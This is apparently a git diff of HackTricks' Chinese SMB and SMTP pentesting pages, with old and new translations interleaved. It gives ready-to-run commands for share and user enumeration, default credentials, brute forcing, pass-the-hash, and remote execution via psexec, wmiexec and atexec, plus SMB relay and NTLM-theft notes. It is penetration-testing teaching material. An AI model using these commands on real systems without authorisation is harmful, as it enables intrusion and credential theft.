这一功能对于网络管理员和安全专业人员评估网络上SMB服务器消息块服务的安全状况至关重要。`enum4linux`提供了目标系统SMB环境的全面视图有助于识别潜在的漏洞并确保SMB服务得到适当的保护
此功能对于网络管理员和安全专业人员评估网络上 SMB (服务器消息块) 服务的安全态势至关重要。`enum4linux` 提供了目标系统 SMB 环境的全面视图,这对于识别潜在漏洞和确保 SMB 服务的适当安全至关重要
```bash
enum4linux -a target_ip
```
上述命令是`enum4linux`如何用于针对由`target_ip`指定的目标执行完整枚举的示例。
上述命令是如何使用 `enum4linux` 对指定的 `target_ip`行完整枚举的示例。
## 什么是NTLM
## 什么是 NTLM
如果你不知道什么是NTLM或者想了解它是如何工作以及如何滥用它你会发现这个关于**NTLM**的页面非常有趣,其中解释了**这个协议的工作原理以及如何利用它**
如果你不知道什么是 NTLM或者你想知道它是如何工作的以及如何利用它你会发现关于 **NTLM** 的这个页面非常有趣,其中解释了 **这个协议是如何工作的以及你如何可以利用它:**
{% content-ref url="../../windows-hardening/ntlm/" %}
[ntlm](../../windows-hardening/ntlm/)
@ -60,16 +61,16 @@ enum4linux -a target_ip
## **服务器枚举**
### **扫描**网络以搜索主机:
### **扫描** 网络以搜索主机:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB 服务器版本
寻找 SMB 版本可能存在的漏洞,重要的是要知道正在使用的版本。如果这些信息在其他使用的工具中没有显示,您可以:
查找可能针对 SMB 版本的漏洞,了解正在使用的版本非常重要。如果此信息未出现在其他使用的工具中,您可以:
- 使用 **MSF** 辅助模块 **_auxiliary/scanner/smb/smb_version**
- 或者使用这个脚本:
* 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
* 或者这个脚本:
```bash
#!/bin/sh
#Author: rewardone
@ -86,22 +87,22 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **搜索漏洞利用**
### **搜索漏洞**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **可能的**
### **可能的**
| **用户名** | **常见密码** |
| -------------------- | ----------------------------------------- |
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
| Administrator, admin | _(空白)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
| Administrator, admin | _(空白)_passwordadministratoradmin |
| arcserve | arcservebackup |
| tivoli, tmersrvd | tivolitmersrvdadmin |
| backupexec, backup | backupexecbackuparcada |
| test, lab, demo | passwordtestlabdemo |
### 暴力破解
@ -131,9 +132,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### 枚举用户、组和登录用户
### 枚举用户、组和登录用户
这些信息应该已经从 enum4linux 和 enum4linux-ng 收集
这些信息应该已经从 enum4linux 和 enum4linux-ng 收集。
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -151,7 +152,7 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
一句话
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
@ -173,7 +174,7 @@ run
`xdg-open smb://cascade.htb/`
#### 在文件浏览器窗口中nautilusthunar 等)
#### 在文件浏览器窗口中nautilus, thunar 等)
`smb://friendzone.htb/general/`
@ -181,7 +182,7 @@ run
### 列出共享文件夹
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用 **null** **凭据/访客用户**
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用 **null** **凭据/访客用户**
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -209,7 +210,7 @@ smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-t
```
### **手动枚举 Windows 共享并连接到它们**
可能您被限制显示主机机器的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,值得尝试手动连接到共享。要手动枚举共享,您可能希望查找类似 NT\_STATUS\_ACCESS\_DENIED 和 NT\_STATUS\_BAD\_NETWORK\_NAME 的响应,当使用有效会话(例如空会话或有效凭据)时。这些响应可能表明共享是否存在但您无权访问,或者共享根本不存在。
可能您被限制显示主机的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,尝试手动连接到共享可能是值得的。要手动枚举共享,您可能想要查找像 NT\_STATUS\_ACCESS\_DENIED 和 NT\_STATUS\_BAD\_NETWORK\_NAME 这样的响应,当使用有效会话(例如,空会话或有效凭据)时。这些可能表明共享是否存在以及您是否没有访问权限,或者共享根本不存在。
Windows 目标的常见共享名称包括
@ -222,14 +223,14 @@ Windows 目标的常见共享名称包括
* SYSVOL
* NETLOGON
(来自 _**网络安全评估第3版**_ 的常见共享名称)
(来自 _**网络安全评估 第三版**_ 的常见共享名称)
您可以尝试使用以下命令连接到它们
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
者使用这个脚本(使用空会话)
脚本(使用空会话)
```bash
#/bin/bash
@ -251,7 +252,7 @@ done
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **从Windows枚举共享/无需第三方工具**
### **从 Windows 枚举共享 / 无需第三方工具**
PowerShell
```powershell
@ -263,21 +264,21 @@ get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD控制台
CMD 控制台
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (图形化)
MMC 快捷方式(图形)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
使用explorer.exe图形化输入 `\\<ip>\` 查看可用的非隐藏共享。
explorer.exe (图形界面),输入 `\\<ip>\`查看可用的非隐藏共享。
### 挂载共享文件夹
```bash
@ -286,7 +287,7 @@ mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **下载文件**
阅读前面的部分,了解如何使用凭据/Pass-the-Hash 连接。
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 进行连接。
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -301,55 +302,64 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
### 域共享文件夹搜索
Commands:
* mask: 指定用于过滤目录中文件的掩码(例如,""表示所有文件)
* recurse: 切换递归开关(默认:关闭)
* prompt: 切换文件名提示开关(默认:开启)
* mget: 将与掩码匹配的所有文件从主机复制到客户端机器
(_Information from the manpage of smbclient_)
### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 蜘蛛。
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 爬虫
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
特别有趣的是共享文件中的名为**`Registry.xml`**的文件,因为它们**可能包含**通过组策略配置了**自动登录**的用户的密码。或者**`web.config`**文件,因为它们包含凭据。
特别有趣的共享文件是名为 **`Registry.xml`** 的文件,因为它们 **可能包含** 配置为通过组策略 **自动登录** 的用户的密码。或者 **`web.config`** 文件,因为它们包含凭据。
{% hint style="info" %}
**SYSVOL共享**可以被域中的所有经过身份验证的用户**读取**。在那里,您可能会**找到**许多不同的批处理、VBScript和PowerShell**脚本**。\
您应该**检查**其中的**脚本**,因为您可能会**找到**诸如**密码**之类的敏感信息
**SYSVOL 共享** 对域中的所有经过身份验证的用户 **可读**。在这里,您可能会 **找到** 许多不同的批处理、VBScript 和 PowerShell **脚本**。\
您应该 **检查** 其中的 **脚本**,因为您可能会 **发现** 敏感信息,例如 **密码**
{% endhint %}
## 读取注册表
您可以尝试使用一些发现的凭据**读取注册表**。Impacket **`reg.py`** 允许您尝试:
您可能能够使用一些发现的凭据 **读取注册表**。Impacket **`reg.py`** 允许您尝试:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## 后渗透
## Post Exploitation
**Samba** 服务器的默认配置通常位于 `/etc/samba/smb.conf`,可能包含一些危险配置:
**Samba** 服务器的 **默认配置** 通常位于 `/etc/samba/smb.conf`,可能包含一些 **危险配置**
| **设置** | **描述** |
| ------------------------- | -------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中可用共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许无需使用密码连接到服务? |
| `enable privileges = yes` | 是否遵守分配给特定 SID 的权限? |
| `create mask = 0777` | 必须分配给新创建文件的权限是什么? |
| `directory mask = 0777` | 必须分配给新创建目录的权限是什么? |
| `logon script = script.sh`| 用户登录时需要执行的脚本是什么 |
| `magic script = script.sh`| 当脚本关闭时应执行哪个脚本? |
| `magic output = script.out`| 魔术脚本的输出应存储在哪里? |
| **设置** | **描述** |
| --------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中可用共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许在不使用密码的情况下连接到服务? |
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建的文件必须分配什么权限? |
| `directory mask = 0777` | 新创建的目录必须分配什么权限? |
| `logon script = script.sh` | 用户登录时需要执行哪个脚本 |
| `magic script = script.sh` | 当脚本关闭时应执行哪个脚本? |
| `magic output = script.out` | 魔法脚本的输出需要存储在哪里? |
命令 `smbstatus` 提供有关服务器和连接到服务器的用户的信息。
命令 `smbstatus` 提供有关 **服务器****谁已连接** 的信息。
## 使用 Kerberos 进行身份验证
## Authenticate using Kerberos
您可以使用工具 **smbclient****rpcclient** **kerberos** 进行身份验证:
您可以使用工具 **smbclient****rpcclient** 进行 **kerberos**证:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
@ -358,7 +368,7 @@ rpcclient -k ws01win10.domain.com
### **crackmapexec**
crackmapexec可以执行命令,滥用任何**mmcexec, smbexec, atexec, wmiexec**中的一个,其中**wmiexec**是默认方法。您可以使用参数`--exec-method`指定要使用的选项:
crackmapexec 可以通过 **mmcexec, smbexec, atexec, wmiexec** 中的任何一种方法 **执行命令**,其中 **wmiexec****默认** 方法。您可以使用参数 `--exec-method` 指定您希望使用的选项:
```bash
apt-get install crackmapexec
@ -382,9 +392,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
这两个选项都会在受害者机器上**创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并使用它来**执行某些操作****psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe** 并将有效载荷放在参数中 --**无文件技术-**-)。\
有关 [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)和 [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)的**更多信息**。\
**kali** 中位于 /usr/share/doc/python3-impacket/examples/
这两个选项将**在受害者机器上创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并利用它来**执行某些操作****psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe** 并将有效载荷作为参数放入 --**无文件技术-**-)。\
有关 [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md) 和 [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md) 的**更多信息**。\
**kali**,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
@ -392,19 +402,19 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**
使用 **参数**`-k`,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmicexec.md)/dcomexec
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
通过**端口135**使用DCOM隐秘地执行命令 shell而不触及磁盘或运行新服务。\
在**kali**中,它位于/usr/share/doc/python3-impacket/examples/
通过 **端口 135** 隐秘地执行命令 shell而不接触磁盘或运行新服务使用 DCOM。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**
使用 **参数**`-k`,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -413,8 +423,8 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
通过任务计划程序执行命令(使用 SMB 上的 _\pipe\atsvc_)。\
**kali** 上的路径为 /usr/share/doc/python3-impacket/examples/
通过任务调度程序执行命令(使用 _\pipe\atsvc_ 通过 SMB)。\
**kali** 中位于 /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
@ -425,42 +435,42 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
## **暴力破解用户凭证**
**这不是推荐的做法,如果尝试次数超过最大允许次数,可能会导致账户被封锁**
**这不推荐,如果超过允许的最大尝试次数,您可能会锁定账户**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB中继攻击
## SMB 继电器攻击
此攻击使用Responder工具包在内部网络上**捕获SMB身份验证会话**,然后将其**中继**到**目标机器**。如果身份验证**会话成功**,它将自动将您**转移到系统** **shell**。\
[**有关此攻击的更多信息,请单击此处。**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
此攻击使用 Responder 工具包来 **捕获内部网络上的 SMB 认证会话**,并将其 **中继****目标机器**。如果认证 **会话成功**,它将自动将您带入 **系统** **shell**。\
[**有关此攻击的更多信息请点击这里。**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Windows库URLMon.dll在页面尝试通过SMB访问某些内容时会自动尝试对主机进行身份验证,例如:`img src="\\10.10.10.10\path\image.jpg"`
当页面尝试通过 SMB 访问某些内容时Windows 库 URLMon.dll 会自动尝试对主机进行身份验证,例如:`img src="\\10.10.10.10\path\image.jpg"`
这发生在以下功能中:
这发生在以下函数中:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
这些功能被一些浏览器和工具如Skype使用
这些函数被一些浏览器和工具(如 Skype使用。
![来源http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (358).png>)
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (358).png>)
### 使用MitMf的SMBTrap
### 使用 MitMf SMBTrap
![来源http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (892).png>)
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (892).png>)
## NTLM窃
## NTLM
类似于SMB陷阱通过在目标系统上植入恶意文件例如通过SMB可以引发SMB身份验证尝试从而允许使用工具如Responder拦截NetNTLMv2哈希。然后可以离线破解哈希或在[SMB中继攻击](./#smb-relay-attack)中使用。
与 SMB 捕获类似,将恶意文件植入目标系统(例如通过 SMB可以引发 SMB 认证尝试,从而允许使用 Responder 等工具拦截 NetNTLMv2 哈希。然后可以离线破解该哈希或在 [SMB 继电器攻击](./#smb-relay-attack) 中使用。
[查看ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
[查看: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks自动命令
## HackTricks 自动命令
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
@ -529,16 +539,17 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[**NFTs**]收藏品,[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

252
network-services-pentesting/pentesting-smtp/README.md
View file

@ -1,62 +1,61 @@
# 25,465,587 - SMTP/s 渗透测试
# 25,465,587 - Pentesting SMTP/s
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用20多个工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## **基本信息**
**简单邮件传输协议SMTP** 是 TCP/IP 套件中用于**发送和接收电子邮件**的协议。由于 SMTP 在接收方端限制消息排队的能力,通常会**POP3 或 IMAP** 一起使用。这些附加协议使用户能够将消息存储在服务器邮箱中,并定期下载它们。
**简单邮件传输协议 (SMTP)** 是在 TCP/IP 套件中用于**发送和接收电子邮件**的协议。由于其在接收方排队消息的限制SMTP 通常**POP3 或 IMAP** 一起使用。这些附加协议使用户能够将消息存储在服务器邮箱中,并定期下载它们。
在实践中,**电子邮件程序**通常使用 **SMTP 发送电子邮件**同时使用 **POP3 或 IMAP 接收**它们。在基于 Unix 的系统上,**sendmail** 是最常用于电子邮件目的的 SMTP 服务器。商业软件包 Sendmail 包含一个 POP3 服务器。此外,**Microsoft Exchange** 提供 SMTP 服务器,并提供包括 POP3 支持的选项。
在实践中,**电子邮件程序** 通常使用 **SMTP 发送电子邮件**而使用 **POP3 或 IMAP 接收** 它们。在基于 Unix 的系统中,**sendmail** 是最常用于电子邮件的 SMTP 服务器。商业软件包 Sendmail 包含一个 POP3 服务器。此外,**Microsoft Exchange** 提供一个 SMTP 服务器,并提供包括 POP3 支持的选项。
**默认端口:** 25,465(ssl),587(ssl)
```
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
```
### 电子邮件头部
### EMAIL Headers
如果你有机会**让受害者发送电子邮件给你**(例如通过网页上的联系表单),一定要这样做,因为**你可以通过查看邮件头部了解受害者的内部拓扑结构**。
如果你有机会**让受害者给你发送一封邮件**(例如通过网页的联系表单),请这样做,因为**你可以通过查看邮件的头部了解受害者的内部拓扑**。
还可以从一个SMTP服务器获取一封邮件尝试**向该服务器发送一封邮件到一个不存在的地址**(因为服务器会向攻击者发送一个 NDN 邮件)。但是,请确保你从一个允许的地址发送邮件(检查 SPF 策略),并且你能够接收 NDN 消息。
也可以从SMTP服务器获取一封邮件尝试**向该服务器发送一封邮件到一个不存在的地址**(因为服务器会向攻击者发送一封NDN邮件。但是请确保你从一个允许的地址发送邮件检查SPF策略并且你可以接收NDN消息。
你还应该尝试**发送不同内容,因为你可以在邮件头部找到更多有趣的信息**,比如:`X-Virus-Scanned: by av.domain.com`\
你应该发送 EICAR 测试文件。\
检测到**防病毒软件**可能会让你利用**已知的漏洞**。
你还应该尝试**发送不同的内容,因为你可以在头部找到更有趣的信息**,例如:`X-Virus-Scanned: by av.domain.com`\
你应该发送EICAR测试文件。\
检测**AV**可能允许你利用**已知漏洞**。
## 基本操作
## Basic actions
### **横幅抓取/基本连接**
### **Banner Grabbing/Basic connection**
**SMTP:**
```bash
nc -vn <IP> 25
```
**SMTPS**
SMTPSSimple Mail Transfer Protocol Secure是一种通过SSL或TLS加密的SMTP协议用于安全地发送电子邮件。
**SMTPS**:
```bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
```
### 查找组织的MX服务器
### 查找组织的 MX 服务器
```bash
dig +short mx google.com
```
@ -65,9 +64,9 @@ dig +short mx google.com
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### NTLM认证 - 信息泄露
### NTLM Auth - 信息泄露
如果服务器支持NTLM认证Windows您可以获取敏感信息版本。更多信息[**这里**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666)。
如果服务器支持 NTLM 认证Windows您可以获取敏感信息版本。更多信息 [**这里**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666)。
```bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
@ -78,11 +77,11 @@ NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```
或者使用 **nmap** 插件 `smtp-ntlm-info.nse` 来**自动化**这个过程。
Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
### 内部服务器名称 - 信息泄露
一些 SMTP 服务器在发出不带完整地址的“MAIL FROM”命令时会自动补全发件人地址从而泄露其内部名称
一些SMTP服务器在发出“MAIL FROM”命令时,如果没有完整地址,会自动补全发件人地址,从而泄露其内部名称:
```
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
@ -101,15 +100,15 @@ EHLO all
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
```
### 嗅探
### Sniffing
检查是否从发送到端口25的数据包中嗅探到一些密码
检查是否从发送到端口 25 的数据包中嗅探到一些密码
### [认证暴力破解](../../generic-methodologies-and-resources/brute-force.md#smtp)
### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
## 用户名暴力破解枚举
**并非总是需要认证**
**认证并不总是需要**
### RCPT TO
```bash
@ -130,8 +129,6 @@ RCPT TO:ed
250 2.1.5 ed... Recipient ok
```
### VRFY
VRFY命令用于验证用户是否存在于SMTP服务器上。攻击者可以使用VRFY命令来枚举用户从而获取有关目标系统的有用信息。在现代SMTP服务器上通常会禁用VRFY命令以防止用户枚举攻击。
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
@ -147,8 +144,6 @@ VRFY root
VRFY blah
550 blah... User unknown
```
### EXPN
### EXPN
```bash
$ telnet 1.1.1.1 25
@ -174,17 +169,17 @@ Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
